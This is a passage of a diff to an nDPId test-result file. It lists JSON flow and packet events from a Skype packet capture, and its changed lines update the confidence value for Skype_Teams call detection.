+00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1095,"source":"skype.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969685484,"flow_last_seen":1431969685484,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969685484,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.31","src_port":13021,"dst_port":40021,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1096,"source":"skype.pcap","alias":"nDPId-test","flow_id":175,"flow_packet_id":3,"flow_last_seen":1431969685579,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431969685579,"pkt":"0NQSxnP1PBXCt3IOCABFAABLzugAAEARKEbAqAEiwKgBAdRHADUAN3UY\/nwBAAABAAAAAAAAAzMzNQEwATcBNwEzBXJzdDEzAXIFc2t5cGUDbmV0AAABAAE="} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1097,"source":"skype.pcap","alias":"nDPId-test","flow_id":176,"flow_packet_id":3,"flow_last_seen":1431969685579,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431969685579,"pkt":"0NQSxnP1PBXCt3IOCABFAABLSKwAAEARroLAqAEiwKgBAeQAADUAN6zvm+wBAAABAAAAAAAAAzMzNQEwATcBNwEzBXJzdDEzAXIFc2t5cGUDbmV0AAAcAAE="} 
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1114,"source":"skype.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969686494,"flow_last_seen":1431969686494,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969686494,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.29","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1114,"source":"skype.pcap","alias":"nDPId-test","flow_id":187,"flow_packet_id":1,"flow_last_seen":1431969686494,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1431969686494,"pkt":"0NQSxnP1PBXCt3IOCABFAAA7KdYAAEAR1RfAqAEib91KHTLdnFgAJyRCnIIC1fLHUFbyfUuPJFSEHOCi7XP7hf4fCpbSA7AYcw=="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1114,"source":"skype.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969686494,"flow_last_seen":1431969686494,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969686494,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.29","src_port":13021,"dst_port":40024,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1114,"source":"skype.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969686494,"flow_last_seen":1431969686494,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969686494,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.29","src_port":13021,"dst_port":40024,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1115,"source":"skype.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969686494,"flow_last_seen":1431969686494,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969686494,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.147","src_port":13021,"dst_port":40019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1115,"source":"skype.pcap","alias":"nDPId-test","flow_id":188,"flow_packet_id":1,"flow_last_seen":1431969686494,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1431969686494,"pkt":"0NQSxnP1PBXCt3IOCABFAAA+wC0AAEAR2OzAqAEinTeCkzLdnFMAKhU5nIQCbtjtgTR5b1SpAOgeT3hZ1sNas6z5WpsHwiEzG2Fdeg=="} 
-00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1115,"source":"skype.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969686494,"flow_last_seen":1431969686494,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969686494,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.147","src_port":13021,"dst_port":40019,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1115,"source":"skype.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969686494,"flow_last_seen":1431969686494,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969686494,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.147","src_port":13021,"dst_port":40019,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 01122{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1119,"source":"skype.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1431969686726,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":544,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":544,"pkt_l4_len":510,"thread_ts_msec":1431969686726,"pkt":"\/\/\/\/\/\/\/\/PBXCt3IOCABFAAIS0J4AAEAR5nLAqAEi\/\/\/\/\/0RcRFwB\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"} 
01118{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1120,"source":"skype.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1431969686726,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":544,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":544,"pkt_l4_len":510,"thread_ts_msec":1431969686726,"pkt":"\/\/\/\/\/\/\/\/PBXCt3IOCABFAAISl+cAAEARXILAqAEiwKgB\/0RcRFwB\/jf1eyJob3N0X2ludCI6IDE1NzMxOTU0NDUsICJ2ZXJzaW9uIjogWzEsIDhdLCAiZGlzcGxheW5hbWUiOiAiIiwgInBvcnQiOiAxNzUwMCwgIm5hbWVzcGFjZXMiOiBbMTQ4MTkzMzcsIDE3NjA5OTYzLCAyMDY0OTM0OSwgMjg1MjE2MDcsIDU4MzQ0OTk2LCA2MDU5NDk4MywgNjQ0MzYwOTksIDk2ODUzMjI0LCA5OTQ2OTc3MywgMTAxMDQ3OTk2LCAxMDgxNTkxMDIsIDEyNTU0MDU2NiwgMTc2OTY0MzA3LCAyNDM2ODI5ODYsIDI0NzkyNTA4NSwgMjYwNDY1MjYxLCAyNzA0MDQ3NDIsIDI4Mzg2MTQ1NywgNDI0NTQwMTk3LCA0NDgzOTczOTMsIDQ1MTQ3MjY1OCwgNTExNzA2NjQyLCA1NjgzOTU4MzMsIDU5NDI0Njk1NCwgNTk4MDYxMDY2LCA2MTU5ODMzNzksIDcyMDA1ODM2MSwgNzM1MDUxODMwLCA3MzYzNDE1MjgsIDc0MTI1NTYxMywgNzc2MDg3MjQ3LCA3ODA4NzA1ODEsIDc4Mjk4MTk0OSwgNzg1MjY2MTc3LCA4MTg3NTI3MTAsIDg1NTY4MjM5MCwgODg0MTIwMTMyLCA5MDg5MTQ4NjhdfQ=="} 01123{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1123,"source":"skype.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1431969686992,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":544,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":544,"pkt_l4_len":510,"thread_ts_msec":1431969686992,"pkt":"\/\/\/\/\/\/\/\/xCwDBkn+CABFAAISTt8AAEARZ\/jAqAFc\/\/\/\/\/0RcRFwB\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"} 
01118{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1124,"source":"skype.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1431969686993,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":544,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":544,"pkt_l4_len":510,"thread_ts_msec":1431969686993,"pkt":"\/\/\/\/\/\/\/\/xCwDBkn+CABFAAISzasAAEARJoTAqAFcwKgB\/0RcRFwB\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"} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1128,"source":"skype.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969687504,"flow_last_seen":1431969687504,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969687504,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.168","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1128,"source":"skype.pcap","alias":"nDPId-test","flow_id":189,"flow_packet_id":1,"flow_last_seen":1431969687504,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1431969687504,"pkt":"0NQSxnP1PBXCt3IOCABFAABBxOwAAEARHhbAqAEinTc4qDLdnEYALROCnIYCHY\/YUYokwK99l51ViNrnwr9nS0r47IMjMyFmHPRTFPvIVw=="} 
-00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1128,"source":"skype.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969687504,"flow_last_seen":1431969687504,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969687504,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.168","src_port":13021,"dst_port":40006,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1128,"source":"skype.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969687504,"flow_last_seen":1431969687504,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969687504,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.168","src_port":13021,"dst_port":40006,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1129,"source":"skype.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969687504,"flow_last_seen":1431969687504,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969687504,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.29","src_port":13021,"dst_port":40010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1129,"source":"skype.pcap","alias":"nDPId-test","flow_id":190,"flow_packet_id":1,"flow_last_seen":1431969687504,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1431969687504,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/rI8AAEAR6\/\/AqAEiQTffHTLdnEoAK4\/BnIgC0n2YTtpud4yFT0SZ+E2i0ODhSKmWbVLKl+n0TQ0fOTc="} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1129,"source":"skype.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969687504,"flow_last_seen":1431969687504,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969687504,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.29","src_port":13021,"dst_port":40010,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1129,"source":"skype.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969687504,"flow_last_seen":1431969687504,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969687504,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.29","src_port":13021,"dst_port":40010,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1130,"source":"skype.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969687504,"flow_last_seen":1431969687504,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969687504,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.166","src_port":13021,"dst_port":40015,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1130,"source":"skype.pcap","alias":"nDPId-test","flow_id":191,"flow_packet_id":1,"flow_last_seen":1431969687504,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1431969687504,"pkt":"0NQSxnP1PBXCt3IOCABFAAA3NGcAAEAR+6bAqAEinTfrpjLdnE8AI+OWnIoCh50u5xbhS9toIKRfor72\/ZRTG\/Y\/lAII"} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1130,"source":"skype.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969687504,"flow_last_seen":1431969687504,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969687504,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.166","src_port":13021,"dst_port":40015,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1130,"source":"skype.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969687504,"flow_last_seen":1431969687504,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969687504,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.166","src_port":13021,"dst_port":40015,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1156,"source":"skype.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969688514,"flow_last_seen":1431969688514,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969688514,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.159","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1156,"source":"skype.pcap","alias":"nDPId-test","flow_id":192,"flow_packet_id":1,"flow_last_seen":1431969688514,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969688514,"pkt":"0NQSxnP1PBXCt3IOCABFAABAzhcAAEARLU\/AqAEib91NnzLdnEkALGRznIwCwyeMbMrdlUQ5AFonNJwRLd3E7Awg+gZSbquojb\/nyMcP"} 
-00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1156,"source":"skype.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969688514,"flow_last_seen":1431969688514,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969688514,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.159","src_port":13021,"dst_port":40009,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1156,"source":"skype.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969688514,"flow_last_seen":1431969688514,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969688514,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.159","src_port":13021,"dst_port":40009,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1157,"source":"skype.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969688514,"flow_last_seen":1431969688514,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969688514,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1157,"source":"skype.pcap","alias":"nDPId-test","flow_id":193,"flow_packet_id":1,"flow_last_seen":1431969688514,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1431969688514,"pkt":"0NQSxnP1PBXCt3IOCABFAAA4ZaYAAEARmVXAqAEib91KEjLdgQkAJLX6nI4C1Tkw7dXubJLsc4XN4Hhz+Cr0PORpW0nsUg=="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1157,"source":"skype.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969688514,"flow_last_seen":1431969688514,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969688514,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1157,"source":"skype.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969688514,"flow_last_seen":1431969688514,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969688514,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1169,"source":"skype.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969689470,"flow_last_seen":1431969689470,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969689470,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.173","src_port":50074,"dst_port":40003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1169,"source":"skype.pcap","alias":"nDPId-test","flow_id":194,"flow_packet_id":1,"flow_last_seen":1431969689470,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969689470,"pkt":"0NQSxnP1PBXCt3IOCABFAABAzR5AAEAGi+rAqAEinTeCrcOanEPZ9P\/0AAAAALAC\/\/+a6AAAAgQFtAEDAwUBAQgKPiNCegAAAAAEAgAA"} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1170,"source":"skype.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969689470,"flow_last_seen":1431969689470,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969689470,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.142","src_port":50075,"dst_port":40003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -677,13 +677,13 @@ 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1171,"source":"skype.pcap","alias":"nDPId-test","flow_id":196,"flow_packet_id":1,"flow_last_seen":1431969689470,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969689470,"pkt":"0NQSxnP1PBXCt3IOCABFAABA7khAAEAGAdHAqAEinTfrnMOcnE7UANcqAAAAALAC\/\/9gqgAAAgQFtAEDAwUBAQgKPiNCegAAAAAEAgAA"} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1172,"source":"skype.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969689470,"flow_last_seen":1431969689470,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969689470,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.151","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1172,"source":"skype.pcap","alias":"nDPId-test","flow_id":197,"flow_packet_id":1,"flow_last_seen":1431969689470,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1431969689470,"pkt":"0NQSxnP1PBXCt3IOCABFAAA6zvgAAEARklXAqAEiQAQXlzLdnF0AJqz9nJAC1zV5OvO9upQBsUXmJpF2nBcsF0HuRy8JJIUg"} 
-00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1172,"source":"skype.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969689470,"flow_last_seen":1431969689470,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969689470,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.151","src_port":13021,"dst_port":40029,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1172,"source":"skype.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969689470,"flow_last_seen":1431969689470,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969689470,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.151","src_port":13021,"dst_port":40029,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 